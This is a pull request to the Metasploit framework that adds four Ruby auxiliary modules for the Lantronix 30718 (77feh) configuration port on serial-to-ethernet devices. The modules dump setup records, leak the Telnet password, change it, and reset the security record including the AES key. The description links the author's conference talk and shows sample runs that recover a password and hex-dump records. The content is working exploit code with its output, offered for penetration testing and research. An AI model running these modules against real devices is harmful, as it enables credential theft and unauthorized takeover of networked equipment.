### PR TITLE
Lantronix abuse of 77feh port

### DIFF
--- a/modules/auxiliary/admin/lantronix/lantronix_77feh_dump_records.rb
+++ b/modules/auxiliary/admin/lantronix/lantronix_77feh_dump_records.rb
@@ -1,0 +1,88 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Lantronix Dump of Setup Records via 77feh',
+      'Description' => %q{
+          This module dumps of setup records on serial-to-ethernet
+        devices via the config port (30718/udp/tcp, enabled by default).
+      },
+      'Author'      => 'kost',
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::CHOST,
+        Opt::RPORT(30718),
+        OptString.new('IPPROTO', [ true, "What IP protocol to use (tcp/udp)", 'udp' ]),
+        OptInt.new('RECSTART', [ true,  'Start from setup record number', 0]),
+        OptInt.new('RECEND', [ true,  'Stop on setup record number', 15]),
+        OptInt.new('SLEEP', [ true,  'Sleep for how many seconds between requests', 0])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    lsock = nil
+    res = nil
+
+    datastore['RECSTART'].upto(datastore['RECEND']) do |recno|
+      begin
+        vprint_status("#{rhost} - dumping setup record no: #{recno} (#{Rex::Text.to_hex_ascii(recno.to_s)}).")
+        if datastore['IPPROTO'] == 'udp' then
+          vprint_status("#{rhost} - using UDP for communication.")
+          lsock = Rex::Socket::Udp.create( {
+            'LocalHost' => datastore['CHOST'] || nil,
+            'PeerHost'  => ip,
+            'PeerPort'  => datastore['RPORT'],
+            'Context'   =>
+            {
+              'Msf' => framework,
+              'MsfExploit' => self
+            }
+          })
+        else
+          vprint_status("#{rhost} - using TCP for communication.")
+          lsock = connect
+        end
+
+        recstr="\x00\x00\x00" + ("e0".to_i(16)+recno).chr
+        # vprint_status("#{rhost} - sending #{Rex::Text.to_hex_dump(recstr)}")
+        lsock.put(recstr)
+
+        result = lsock.recvfrom(65535, 10) and result[1]
+        res = result[0]
+        # vprint_status("#{rhost} - got #{Rex::Text.to_hex_dump(res)}")
+
+        if res and res.length > 4 and res[0,3] == "\x00\x00\x00"
+          print_good("#{rhost} - got #{Rex::Text.to_hex_dump(res)}")
+        else
+          print_status("#{rhost} - Unusual response from host")
+        end
+
+      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
+        print_error("Connection error")
+      rescue ::Interrupt
+        raise $!
+      rescue ::Exception => e
+        print_error("Unknown error: #{e.class} #{e}")
+      ensure
+        lsock.close if lsock
+      end
+      vprint_status("#{rhost} - Sleeping for #{datastore['SLEEP']}")
+      sleep datastore["SLEEP"]
+    end
+  end
+
+end

--- a/modules/auxiliary/admin/lantronix/lantronix_77feh_leak.rb
+++ b/modules/auxiliary/admin/lantronix/lantronix_77feh_leak.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Lantronix Leak exploitation` via 77feh',
+      'Description' => %q{
+          This module exploits Leak exploitation through RCR record on serial-to-ethernet
+        devices via the config port (30718/udp/tcp, enabled by default).
+      },
+      'Author'      => 'kost',
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::CHOST,
+        Opt::RPORT(30718),
+        OptString.new('IPPROTO', [ true, "What IP protocol to use (tcp/udp)", 'udp' ]),
+        OptInt.new('COUNT', [ true,  'Number of times to perform dump', 1]),
+        OptInt.new('SLEEP', [ true,  'Sleep for how many seconds between requests', 0])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    lsock = nil
+    res = nil
+
+    datastore['COUNT'].times do
+      begin
+        if datastore['IPPROTO'] == 'udp' then
+          vprint_status("#{rhost} - using UDP for communication.")
+          lsock = Rex::Socket::Udp.create( {
+            'LocalHost' => datastore['CHOST'] || nil,
+            'PeerHost'  => ip,
+            'PeerPort'  => datastore['RPORT'],
+            'Context'   =>
+            {
+              'Msf' => framework,
+              'MsfExploit' => self
+            }
+          })
+        else
+          vprint_status("#{rhost} - using TCP for communication.")
+          lsock = connect
+        end
+
+        lsock.put("\x00\x00\x00\xF4")
+
+        result = lsock.recvfrom(65535, 10) and result[1]
+        res = result[0]
+        vprint_status("#{rhost} - got #{Rex::Text.to_hex_dump(res)}")
+
+        if res and res.length > 18 and res[0,4] == "\x00\x00\x00\xF5"
+            # vprint_status("#{rhost} - Got packet with expected size.")
+            simplepass = res[12,4]
+            if simplepass == "\x00\x00\x00\x00"
+              print_status("#{rhost} - Leak: disabled.")
+            else
+              print_good("#{rhost} - Leak: #{simplepass.to_s} (#{Rex::Text.to_hex_dump(simplepass.to_s)})")
+            end
+        else
+          print_status("#{rhost} - Unusual response from host")
+        end
+
+      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
+        print_error("Connection error")
+      rescue ::Interrupt
+        raise $!
+      rescue ::Exception => e
+        print_error("Unknown error: #{e.class} #{e}")
+      ensure
+        lsock.close if lsock
+      end
+      vprint_status("#{rhost} - Sleeping for #{datastore['SLEEP']}")
+      sleep datastore["SLEEP"]
+    end
+  end
+
+end

--- a/modules/auxiliary/admin/lantronix/lantronix_77feh_password.rb
+++ b/modules/auxiliary/admin/lantronix/lantronix_77feh_password.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Lantronix Password Management via 77feh',
+      'Description' => %q{
+          This module can manage simple password on Lantronix serial-to-ethernet
+        devices via the config port (30718/udp/tcp, enabled by default).
+      },
+      'Author'      => 'kost',
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::CHOST,
+        Opt::RPORT(30718),
+        OptString.new('PASSWORD', [ false, "What password to set", nil ]),
+        OptString.new('IPPROTO', [ true, "What IP protocol to use (tcp/udp)", 'udp' ])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    lsock = nil
+    simplepass = ''
+    res = nil
+
+    begin
+      if datastore['IPPROTO'] == 'udp' then
+        vprint_status("#{rhost} - using UDP for communication.")
+        lsock = Rex::Socket::Udp.create( {
+          'LocalHost' => datastore['CHOST'] || nil,
+          'PeerHost'  => ip,
+          'PeerPort'  => datastore['RPORT'],
+          'Context'   =>
+          {
+            'Msf' => framework,
+            'MsfExploit' => self
+          }
+        })
+      else
+        vprint_status("#{rhost} - using TCP for communication.")
+        lsock = connect
+      end
+
+      lsock.put("\x00\x00\x00\xF8")
+
+      result = lsock.recvfrom(65535, 10) and result[1]
+      res = result[0]
+      # vprint_status("#{rhost} - got #{Rex::Text.to_hex_dump(res)}")
+
+      if res and res.length > 18 and res[0,4] == "\x00\x00\x00\xF9"
+          # vprint_status("#{rhost} - Got packet with expected size.")
+          simplepass = res[12,4]
+          if simplepass == "\x00\x00\x00\x00"
+            print_status("#{rhost} - Simple password disabled. You can login without password or enhanced password.")
+          else
+            print_good("#{rhost} - Telnet password found: #{simplepass.to_s}")
+
+            report_auth_info({
+              :host         => rhost,
+              :port         => 9999,
+              :sname        => 'telnet',
+              :duplicate_ok => false,
+              :pass         => simplepass.to_s
+            })
+          end
+      else
+        print_status("#{rhost} - Unusual response from host")
+      end
+
+      # if password is set, change it
+      if datastore['PASSWORD'] then
+        if datastore['PASSWORD'].length != 4 then
+          vprint_error("#{rhost} - Length of password should be fixed size of 4 chars")
+        else
+          vprint_status("#{rhost} - password set. Changing password to #{datastore['PASSWORD']}")
+          res[12,4]=datastore['PASSWORD']
+          vprint_status("#{rhost} - sending #{Rex::Text.to_hex_dump(res)}")
+          lsock.put(res)
+        end
+      end
+
+    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
+      print_error("Connection error")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Unknown error: #{e.class} #{e}")
+    ensure
+      lsock.close if lsock
+    end
+
+  end
+
+end

--- a/modules/auxiliary/admin/lantronix/lantronix_77feh_reset_sec.rb
+++ b/modules/auxiliary/admin/lantronix/lantronix_77feh_reset_sec.rb
@@ -1,0 +1,83 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Lantronix Security Record Reset via 77feh',
+      'Description' => %q{
+          This module resets security setup record from Lantronix serial-to-ethernet
+        devices via the config port (30718/udp/tcp, enabled by default). Depending on
+        version, it can preserve AES key.
+      },
+      'Author'      => 'kost',
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::CHOST,
+        Opt::RPORT(30718),
+        OptBool.new('RESETAES', [false, "Reset AES part of security record", true]),
+        OptString.new('IPPROTO', [ true, "What IP protocol to use (tcp/udp)", 'udp' ])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    reset_sec = "\x00\x00\x00\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x75\x62\x6c\x69\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    reset_enh = "\x00\x00\x00\xc1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x75\x62\x6c\x69\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    lsock = nil
+
+    begin
+      if datastore['IPPROTO'] == 'udp' then
+        lsock = Rex::Socket::Udp.create( {
+          'LocalHost' => datastore['CHOST'] || nil,
+          'PeerHost'  => ip,
+          'PeerPort'  => datastore['RPORT'],
+          'Context'   =>
+          {
+            'Msf' => framework,
+            'MsfExploit' => self
+          }
+        })
+      else
+        lsock = connect
+      end
+
+      if datastore['RESETAES'] then
+        lsock.put(reset_enh)
+      else
+        lsock.put(reset_sec)
+      end
+
+      res = lsock.recvfrom(65535, 0.5) and res[1]
+
+      if res
+        if res[0,4] == "\x00\x00\x00\xB1"
+          print_good("#{rhost} - Successful reset of security record.")
+        else
+          print_status("#{rhost} - Unusual response from host")
+        end
+      end
+    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
+      print_error("Connection error")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Unknown error: #{e.class} #{e}")
+    ensure
+      lsock.close if lsock
+    end
+
+  end
+
+end

--- a/modules/auxiliary/admin/lantronix/lantronix_77feh_reset_sec.rb
+++ b/modules/auxiliary/admin/lantronix/lantronix_77feh_reset_sec.rb
@@ -59,7 +59,9 @@ class Metasploit4 < Msf::Auxiliary
         lsock.put(reset_sec)
       end
 
-      res = lsock.recvfrom(65535, 0.5) and res[1]
+      result = lsock.recvfrom(65535, 10) and result[1]
+      res = result[0]
+      vprint_status("#{rhost} - got #{Rex::Text.to_hex_dump(res)}")
 
       if res
         if res[0,4] == "\x00\x00\x00\xB1"


### PR DESCRIPTION
Hello!

These are all modules which are abusing Lantronix 77feh port.

Take a look at the standalone utility:
https://github.com/kost/lantronix-witchcraft
And presentation I've done on Confidence/BalCCon:
http://www.slideshare.net/kost/vk-exploringtreasuresof77-fehlantronixconfidence2014

Example run:

```
msf exploit(psexec_psh) > use auxiliary/admin/lantronix/lantronix_77feh_password
msf auxiliary(lantronix_77feh_password) > show options

Module options (auxiliary/admin/lantronix/lantronix_77feh_password):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The local client address
   IPPROTO   udp              yes       What IP protocol to use (tcp/udp)
   PASSWORD                   no        What password to set
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     30718            yes       The target port
   THREADS   1                yes       The number of concurrent threads

msf auxiliary(lantronix_77feh_password) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(lantronix_77feh_password) > show options

Module options (auxiliary/admin/lantronix/lantronix_77feh_password):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The local client address
   IPPROTO   udp              yes       What IP protocol to use (tcp/udp)
   PASSWORD                   no        What password to set
   RHOSTS    192.168.1.1    yes       The target address range or CIDR identifier
   RPORT     30718            yes       The target port
   THREADS   1                yes       The number of concurrent threads

msf auxiliary(lantronix_77feh_password) > run

[+] 192.168.1.1 - Telnet password found: test
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(lantronix_77feh_password) >

msf auxiliary(lantronix_77feh_dump_records) > use auxiliary/admin/lantronix/lantronix_77feh_dump_records
msf auxiliary(lantronix_77feh_dump_records) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(lantronix_77feh_dump_records) > show options

Module options (auxiliary/admin/lantronix/lantronix_77feh_dump_records):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The local client address
   IPPROTO   udp              yes       What IP protocol to use (tcp/udp)
   RECEND    15               yes       Stop on setup record number
   RECSTART  0                yes       Start from setup record number
   RHOSTS    192.168.1.1    yes       The target address range or CIDR identifier
   RPORT     30718            yes       The target port
   SLEEP     0                yes       Sleep for how many seconds between requests
   THREADS   1                yes       The number of concurrent threads

msf auxiliary(lantronix_77feh_dump_records) > run


[+] 192.168.1.1 - got 00 00 00 d6 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 03 01 00 00 00 00 00    |................|
03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 03 01 00 00 00    |................|
00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 03 01 00    |................|
00 00                                              |..|


[+] 192.168.1.1 - got 00 00 00 d7 04 06 08 00 00 00 00 80 00 80 00 80    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00                                              |..|
```
